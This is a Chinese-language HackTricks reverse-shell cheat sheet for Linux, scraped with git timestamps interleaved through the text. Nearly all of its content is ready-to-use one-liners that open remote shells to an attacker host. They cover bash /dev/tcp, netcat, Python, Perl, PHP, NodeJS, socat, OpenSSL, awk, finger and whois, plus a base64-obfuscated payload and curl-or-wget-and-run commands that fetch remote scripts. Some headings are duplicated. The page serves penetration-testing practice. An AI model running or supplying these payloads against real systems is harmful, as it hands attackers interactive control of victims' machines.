2023-12-30 22:37:12 +00:00
# Shells - Linux
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 03:43:18 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 03:43:18 +00:00
其他支持HackTricks的方式:
2023-12-30 22:37:12 +00:00
2024-02-06 03:43:18 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-24 12:24:51 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-03-09 13:16:16 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**。**
2024-02-06 03:43:18 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-03-14 23:34:01 +00:00
**Try Hard Security Group**
2024-03-24 12:24:51 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:34:01 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2024-03-24 12:24:51 +00:00
**如果您对这些shell有任何疑问, 可以使用** [**https://explainshell.com/** ](https://explainshell.com ) **进行检查。**
2023-09-03 01:34:43 +00:00
2024-03-14 23:34:01 +00:00
## Full TTY
2023-09-03 01:34:43 +00:00
2024-03-24 12:24:51 +00:00
**一旦获得反向shell, 请阅读[**此页面以获取完整的TTY**](full-ttys.md)**。**
2020-08-19 11:54:25 +00:00
2022-05-11 14:59:34 +00:00
## Bash | sh
2020-07-15 15:43:14 +00:00
```bash
2022-05-11 14:59:34 +00:00
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
2020-07-15 15:43:14 +00:00
bash -i >& /dev/tcp/< ATTACKER-IP > /< PORT > 0>& 1
2023-03-30 19:24:10 +00:00
bash -i >& /dev/udp/127.0.0.1/4242 0>& 1 #UDP
2020-07-15 15:43:14 +00:00
0< &196; exec 196< >/dev/tcp/< ATTACKER-IP > /< PORT > ; sh < & 196 >& 196 2>& 196
exec 5< >/dev/tcp/< ATTACKER-IP > /< PORT > ; while read line 0< &5; do $line 2>& 5 >&5; done
2023-03-30 19:24:10 +00:00
#Short and bypass (credits to Dikline)
2021-03-30 00:10:09 +00:00
(sh)0>/dev/tcp/10.10.10.10/9091
2022-09-13 16:41:09 +00:00
#after getting the previous shell to get the output to execute
2021-03-30 00:10:09 +00:00
exec >& 0
2020-07-15 15:43:14 +00:00
```
2024-02-06 03:43:18 +00:00
### 符号安全的shell
2020-07-15 15:43:14 +00:00
```bash
#If you need a more stable connection do:
2020-11-05 20:05:40 +00:00
bash -c 'bash -i >& /dev/tcp/< ATTACKER-IP > /< PORT > 0>& 1'
2020-07-15 15:43:14 +00:00
#Stealthier method
2020-11-05 20:05:40 +00:00
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
2020-07-15 15:43:14 +00:00
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
2023-08-03 19:12:22 +00:00
#### Shell解释
2020-07-15 15:43:14 +00:00
2024-02-06 03:43:18 +00:00
1. ** `bash -i` **: 此部分命令启动一个交互式 (`-i`) Bash shell。
2024-03-10 13:33:37 +00:00
2. ** `>&` **: 此部分命令是将**标准输出** (`stdout`) 和**标准错误** (`stderr`) **重定向到同一目的地**的简写表示。
3. ** `/dev/tcp/<攻击者IP>/<端口>` **: 这是一个特殊文件,**表示与指定IP地址和端口的TCP连接**。
2024-02-06 03:43:18 +00:00
* 通过**将输出和错误流重定向到此文件**, 该命令有效地将交互式shell会话的输出发送到攻击者的机器。
2024-03-10 13:33:37 +00:00
4. ** `0>&1` **: 此部分命令**将标准输入 (`stdin`) 重定向到与标准输出 (`stdout`) 相同的目的地**。
2020-11-15 22:04:11 +00:00
2024-02-06 03:43:18 +00:00
### 创建文件并执行
2020-11-15 22:04:11 +00:00
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1< ATTACKER-IP > /< PORT > 0>& 1' > /tmp/sh.sh; bash /tmp/sh.sh;
2020-11-15 22:28:16 +00:00
wget http://< IP attacker > /shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
2020-11-15 22:04:11 +00:00
```
2024-02-07 05:49:16 +00:00
## 正向 Shell
2022-02-09 20:23:12 +00:00
2024-03-24 12:24:51 +00:00
在处理基于 Linux 的 Web 应用中的 **远程代码执行 (RCE)** 漏洞时,通过网络防御措施如 iptables 规则或复杂的数据包过滤机制可能会阻碍反向 shell 的获取。在这种受限环境中,一种替代方法是建立一个 PTY (伪终端) shell, 以更有效地与受损系统进行交互。
2024-03-10 13:33:37 +00:00
一个推荐的工具是 [toboggan ](https://github.com/n3rada/toboggan.git ),它简化了与目标环境的交互。
2024-03-24 12:24:51 +00:00
要有效地利用 toboggan, 创建一个针对目标系统 RCE 上下文的 Python 模块。例如,一个名为 `nix.py` 的模块可以按以下结构设置:
2024-03-10 13:33:37 +00:00
```python3
import jwt
import httpx
def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*& L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)
response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)
# Check if the request was successful
response.raise_for_status()
2024-02-07 05:49:16 +00:00
2024-03-10 13:33:37 +00:00
return response.text
```
然后,您可以运行:
```shell
toboggan -m nix.py -i
```
直接利用交互式shell。您可以添加`-b`以进行Burpsuite集成, 并删除`-i`以获得更基本的rce包装。
另一种可能性是使用`IppSec`的前向shell实现[**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)。
2022-02-09 20:23:12 +00:00
2023-12-30 22:37:12 +00:00
您只需要修改:
2022-02-09 20:23:12 +00:00
2024-03-10 13:33:37 +00:00
- 受攻击主机的URL
- 您的有效负载的前缀和后缀(如果有的话)
- 发送有效负载的方式(头部?数据?额外信息?)
2022-02-09 20:23:12 +00:00
2024-03-24 12:24:51 +00:00
然后,您可以**发送命令**,甚至**使用`upgrade`命令**来获得完整的PTY( 请注意, 管道的读取和写入会有大约1.3秒的延迟)。
2022-02-09 20:23:12 +00:00
2022-05-11 14:59:34 +00:00
## Netcat
2020-07-15 15:43:14 +00:00
```bash
nc -e /bin/sh < ATTACKER-IP > < PORT >
nc < ATTACKER-IP > < PORT > | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|nc < ATTACKER-IP > < PORT > >/tmp/f
nc < ATTACKER-IP > < PORT1 > | /bin/bash | nc < ATTACKER-IP > < PORT2 >
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0< /tmp/bkpipe | nc < ATTACKER-IP > < PORT > 1>/tmp/bkpipe
```
2023-05-15 10:19:32 +00:00
## gsocket
2024-03-24 12:24:51 +00:00
在[https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)中查看
2023-05-15 10:19:32 +00:00
```bash
bash -c "$(curl -fsSL gsocket.io/x)"
```
2022-05-11 14:59:34 +00:00
## Telnet
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
Telnet是一种用于远程登录的协议, 可通过命令行连接到远程计算机。 Telnet不加密数据传输, 因此不安全, 建议使用SSH等更安全的替代方案。
2020-07-15 15:43:14 +00:00
```bash
telnet < ATTACKER-IP > < PORT > | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>& 1|telnet < ATTACKER-IP > < PORT > >/tmp/f
telnet < ATTACKER-IP > < PORT > | /bin/bash | telnet < ATTACKER-IP > < PORT >
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0< /tmp/bkpipe | telnet < ATTACKER-IP > < PORT > 1>/tmp/bkpipe
```
2022-05-11 14:59:34 +00:00
## Whois
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**攻击者**
2020-07-15 15:43:14 +00:00
```bash
while true; do nc -l < port > ; done
```
2024-02-07 05:49:16 +00:00
**受害者**
2024-03-24 12:24:51 +00:00
要发送命令, 请将其写下, 按Enter, 然后按CTRL+D( 停止STDIN)
2020-07-15 15:43:14 +00:00
```bash
export X=Connected; while true; do X=`eval $(whois -h < IP > -p < Port > "Output: $X")`; sleep 1; done
```
2024-02-06 03:43:18 +00:00
## Python
2022-05-11 14:59:34 +00:00
## Python
2020-07-15 15:43:14 +00:00
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
2023-08-03 19:12:22 +00:00
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
2020-07-15 15:43:14 +00:00
```
2022-05-11 14:59:34 +00:00
## Perl
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
Perl是一种流行的脚本语言, 通常用于文本处理和系统管理任务。Perl脚本可以在Linux系统上运行, 并且可以通过网络连接进行交互。Perl脚本通常以.pl为扩展名。
2020-07-15 15:43:14 +00:00
```bash
perl -e 'use Socket;$i="< ATTACKER-IP > ";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
```
2022-05-11 14:59:34 +00:00
## Ruby
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
Ruby是一种灵活且简单易学的编程语言, 常用于编写脚本和Web应用程序。Ruby的一个强大功能是元编程, 允许程序在运行时修改自身结构。Ruby还有一个庞大的社区, 提供了许多有用的库和工具, 使开发人员能够快速构建功能强大的应用程序。
2020-07-15 15:43:14 +00:00
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i < & %d >& %d 2>& %d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
2022-05-11 14:59:34 +00:00
## PHP
2024-02-06 03:43:18 +00:00
2024-03-14 23:34:01 +00:00
PHP是一种流行的服务器端脚本语言, 通常用于Web开发。
2023-09-03 01:34:43 +00:00
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i < & 3 >& 3 2>&3"); '
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
2023-08-03 19:12:22 +00:00
2023-09-03 01:34:43 +00:00
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
2023-08-03 19:12:22 +00:00
```
2023-09-03 01:34:43 +00:00
## Java
2024-03-14 23:34:01 +00:00
2024-03-24 12:24:51 +00:00
## Java
2023-09-03 01:34:43 +00:00
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5< >/dev/tcp/ATTACKING-IP/80;cat <& 5 | while read line; do \$line 2>& 5 >&5; done"] as String[])
p.waitFor()
2023-08-03 19:12:22 +00:00
```
2023-09-03 01:34:43 +00:00
## Ncat
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
Ncat是一个功能强大的网络工具, 可以用于连接、侦听、端口扫描和数据传输。
2023-08-03 19:12:22 +00:00
```bash
2023-09-03 01:34:43 +00:00
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
2023-08-03 19:12:22 +00:00
```
2023-09-03 01:34:43 +00:00
## Golang
2024-03-09 13:32:43 +00:00
2024-03-24 12:24:51 +00:00
### Reverse Shell
#### Description
The Go programming language, also known as Golang, is a powerful tool for creating reverse shells due to its cross-platform support and efficiency. Reverse shells written in Golang can be compiled for various operating systems and architectures, making them versatile for penetration testing and red teaming activities.
#### Resources
- [Golang Reverse Shell ](https://github.com/fatih/color )
- [Golang Cross Compilation ](https://github.com/mitchellh/gox )
2023-09-03 01:34:43 +00:00
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go & & go run /tmp/t.go & & rm /tmp/t.go
```
## Lua
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
Lua是一种轻量级、高效的脚本语言, 常用于嵌入式系统和游戏开发中。 Lua脚本可以通过解释器执行, 也可以编译成字节码运行。 Lua具有简洁的语法和强大的扩展能力, 支持面向过程、函数式和面向对象的编程范式。 Lua还提供了丰富的标准库和第三方库, 方便开发人员快速实现各种功能。 Lua脚本可以与C/C++等语言轻松集成,使其在各种应用场景中得到广泛应用。
2020-07-15 15:43:14 +00:00
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i < & 3 >& 3 2>&3'); "
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
2022-05-11 14:59:34 +00:00
## NodeJS
2024-02-06 03:43:18 +00:00
2024-03-24 12:24:51 +00:00
NodeJS是一个基于Chrome V8引擎的JavaScript运行环境。它允许在服务器端运行JavaScript代码, 提供了丰富的库和模块, 使开发人员能够轻松构建高性能的网络应用程序。
2020-07-15 15:43:14 +00:00
```javascript
(function(){
2023-08-03 19:12:22 +00:00
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
2020-07-15 15:43:14 +00:00
})();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
2021-11-08 23:40:13 +00:00
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>& 1'")
2020-07-15 15:43:14 +00:00
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
2022-05-29 23:24:32 +00:00
// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
or
// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');
or
2020-07-15 15:43:14 +00:00
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
2022-10-17 15:02:34 +00:00
## OpenSSL
2020-07-15 15:43:14 +00:00
2024-02-06 03:43:18 +00:00
攻击者( Kali)
2020-07-15 15:43:14 +00:00
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port > #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port2 > #Here yo will be able to get the response
```
2023-08-03 19:12:22 +00:00
受害者
2020-07-15 15:43:14 +00:00
```bash
#Linux
openssl s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |/bin/bash|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
#Windows
openssl.exe s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |cmd.exe|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
```
2022-05-11 14:59:34 +00:00
## **Socat**
2020-07-15 15:43:14 +00:00
[https://github.com/andrew-d/static-binaries ](https://github.com/andrew-d/static-binaries )
2024-02-07 05:49:16 +00:00
### 绑定 shell
2020-07-15 15:43:14 +00:00
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
2023-08-03 19:12:22 +00:00
attacker> socat FILE:`tty`,raw,echo=0 TCP:< victim_ip > :1337
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
### 反向 shell
2020-07-15 15:43:14 +00:00
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:< attackers_ip > :1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
2022-05-11 14:59:34 +00:00
## Awk
2024-02-06 03:43:18 +00:00
2024-03-10 13:33:37 +00:00
## Awk
2020-07-15 15:43:14 +00:00
```bash
2023-08-03 19:12:22 +00:00
awk 'BEGIN {s = "/inet/tcp/0/< IP > /< PORT > "; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
2020-07-15 15:43:14 +00:00
```
2023-12-30 22:37:12 +00:00
## Finger
2023-09-03 01:34:43 +00:00
2023-12-30 22:37:12 +00:00
**攻击者**
2023-08-03 19:12:22 +00:00
```bash
while true; do nc -l 79; done
```
2024-03-24 12:24:51 +00:00
将命令写下来, 按回车, 然后按CTRL+D( 停止STDIN)
2024-03-14 23:34:01 +00:00
2024-03-24 12:24:51 +00:00
**受害者**
2020-07-15 15:43:14 +00:00
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@< IP > 2> /dev/null')`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@< IP > 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
2024-02-06 03:43:18 +00:00
## Gawk
2024-03-09 13:16:16 +00:00
## Gawk
2020-07-15 15:43:14 +00:00
```bash
#!/usr/bin/gawk -f
BEGIN {
2023-08-03 19:12:22 +00:00
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
2020-07-15 15:43:14 +00:00
}
```
2022-05-11 14:59:34 +00:00
## Xterm
2020-07-15 15:43:14 +00:00
2024-02-07 05:49:16 +00:00
这将尝试连接到您系统的6001端口:
2020-07-15 15:43:14 +00:00
```bash
xterm -display 10.0.0.1:1
```
2024-03-14 23:34:01 +00:00
要捕获反向 shell, 您可以使用以下命令( 将监听端口 6001) :
2020-07-15 15:43:14 +00:00
```bash
2024-02-07 05:49:16 +00:00
# Authorize host
2020-07-15 15:43:14 +00:00
xhost +targetip
2024-02-07 05:49:16 +00:00
# Listen
Xnest :1
2020-07-15 15:43:14 +00:00
```
2022-05-11 14:59:34 +00:00
## Groovy
2020-07-15 15:43:14 +00:00
2024-02-06 03:43:18 +00:00
由[frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) 注意: Java反向shell也适用于Groovy
2020-07-15 15:43:14 +00:00
```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
2024-02-07 05:49:16 +00:00
## 参考资料
2024-03-09 13:16:16 +00:00
2024-02-07 05:49:16 +00:00
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/ ](https://highon.coffee/blog/reverse-shell-cheat-sheet/ )
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell ](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell )
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/ ](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/ )
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md )
2020-07-15 15:43:14 +00:00
2024-03-14 23:34:01 +00:00
**Try Hard Security Group**
2024-03-24 12:24:51 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-14 23:34:01 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-14 23:34:01 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-30 22:37:12 +00:00
2024-03-14 23:34:01 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-03-14 23:34:01 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-06 03:43:18 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-10 13:33:37 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-03-24 12:24:51 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-02-06 03:43:18 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >